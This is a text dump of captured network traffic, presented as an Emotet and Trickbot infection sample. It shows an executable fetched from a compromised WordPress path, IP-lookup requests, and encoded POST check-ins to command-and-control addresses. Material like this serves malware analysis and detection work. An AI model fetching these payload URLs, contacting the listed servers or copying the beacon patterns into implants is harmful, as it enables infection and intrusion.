Text Example

Emotet Banking Trojan and Trickbot Malware Traffic Sample infection w/Spambot Noise PCAP file Download

2019-09-18 13:32:22.678529 IP 10.9.18.101.49160 > 124.158.6.218.80: Flags [P.], seq 4191540612:4191540891, ack 2860101733, win 64240, length 279: HTTP: GET /wp-admin/n2keep7/ HTTP/1.1
GET /wp-admin/n2keep7/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: thinhvuongmedia.com
DNT: 1
Connection: Keep-Alive

2019-09-18 13:32:22.942838 IP 124.158.6.218.80 > 10.9.18.101.49160: Flags [P.], seq 1:1277, ack 279, win 64240, length 1276: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Date: Wed, 18 Sep 2019 17:26:02 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.33
X-Powered-By: PHP/5.6.33
Set-Cookie: 5d8268aa1193f=1568827562; expires=Wed, 18-Sep-2019 17:27:02 GMT; Max-Age=60; path=/
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 18 Sep 2019 17:26:02 GMT
Expires: Wed, 18 Sep 2019 17:26:02 GMT
Content-Disposition: attachment; filename="i5pv72yr.exe"
Content-Transfer-Encoding: binary
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload

2019-09-18 13:33:30.627377 IP 10.9.18.101.49165 > 66.228.32.31.443: Flags [P.], seq 3657721627:3657721896, ack 2496123025, win 64240, length 269
GET /whoami.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 66.228.32.31:443
Cache-Control: no-cache

2019-09-18 13:33:30.669920 IP 10.9.18.101.49164 > 189.129.4.186.80: Flags [P.], seq 899:1832, ack 2600252, win 63022, length 933: HTTP: POST /rtm/symbols/ HTTP/1.1
POST /rtm/symbols/ HTTP/1.1
Referer: http://189.129.4.186/rtm/symbols/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 189.129.4.186
Content-Length: 518
Connection: Keep-Alive
Cache-Control: no-cache

6ll8i995327yEb1qC=SbbKQbNltyr7OEcfzxrUQ304Q2%2FW6l5R9lo%2B5pVxib%2FIt4w3Sjeay5KbFubuIws4O0t7iA%2FTTdyiyRHbY7ySX3cga1z4cQuduITiXM9R5e7rTet9Uod5fFGxgh4JKFGS5n1sQ2TqoRhHBRx7cyBqBFIuag5dqUNeimMgsfRfYiwz39hBgErZ2D0Phl7Y6pFo%2BgASm3UxQKPwVMO8ux4AN2qvVtS2pEQ1HZZcDFci1m1YUNPlvgGhz6Gdpiiz2nZ%2Fr4fpHEK8spNliNSciLGdp7XKmD3rkLzPW5Y2Gm6J0PHywumZH0hJryQUQdwGmeWY8LiNcnQW4bRzxcA%2FSgIA0B8peygnfyCIwigVnD%2FwUBRRFjTCh5crDpm86cA9sZx1tnMgWbVF3cyJLDXvAkyYI%2B9IReYi9WIMTYjpUuPBxEm5zYaLYolpypw07kquVeRU5xXpSD3wp4D7w%2BmBFphGa1%2FKfn4%3D
2019-09-18 13:33:30.713609 IP 10.9.18.101.49166 > 104.236.185.25.8080: Flags [P.], seq 1031397366:1031397638, ack 3231780717, win 64240, length 272: HTTP: GET /whoami.php HTTP/1.1
GET /whoami.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 104.236.185.25:8080
Cache-Control: no-cache

2019-09-18 13:33:30.722484 IP 10.9.18.101.49167 > 104.236.185.25.8080: Flags [P.], seq 2799073531:2799073803, ack 2887398240, win 64240, length 272: HTTP: GET /whoami.php HTTP/1.1
GET /whoami.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 104.236.185.25:8080
Cache-Control: no-cache

2019-09-18 13:33:31.019952 IP 66.228.32.31.443 > 10.9.18.101.49165: Flags [P.], seq 1:211, ack 269, win 64240, length 210
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 18 Sep 2019 17:33:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding

e
173.66.146.112
0

2019-09-18 13:33:31.096777 IP 189.129.4.186.80 > 10.9.18.101.49164: Flags [P.], seq 2600252:2600556, ack 1832, win 64240, length 304: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 18 Sep 2019 17:33:30 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 148
Connection: keep-alive

2019-09-18 13:33:35.224641 IP 10.9.18.101.49184 > 66.228.32.31.443: Flags [P.], seq 497095651:497096370, ack 1689891519, win 64240, length 719
POST /arizona/forced/sess/merge/ HTTP/1.1
Referer: http://66.228.32.31/arizona/forced/sess/merge/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 66.228.32.31:443
Content-Length: 274
Connection: Keep-Alive
Cache-Control: no-cache

Gr2qPfZCOq0zLdd=i7eSuPXcauG6h3x4nXsddr2HLhaseSX3P3dp7S4gBcKhcmoqkbf7HcBzb%2Brohq%2FeEkR%2BTnIjMI8V8T%2BAxqF%2FTEK2DhDrGASZbhUbLTPbf1upgbttXYNLrhthHlz4c5qcEHunBZWx0TLZ6Jd6XQvpghjIetcPXLPTuULc9957VIe9PeppR6pU9rDnk2VG%2Fw1PflceQ%2Fw59Gx%2BnGblT3orLZBUGOgmdwfAYGBjYe%2BuZLDzlb1T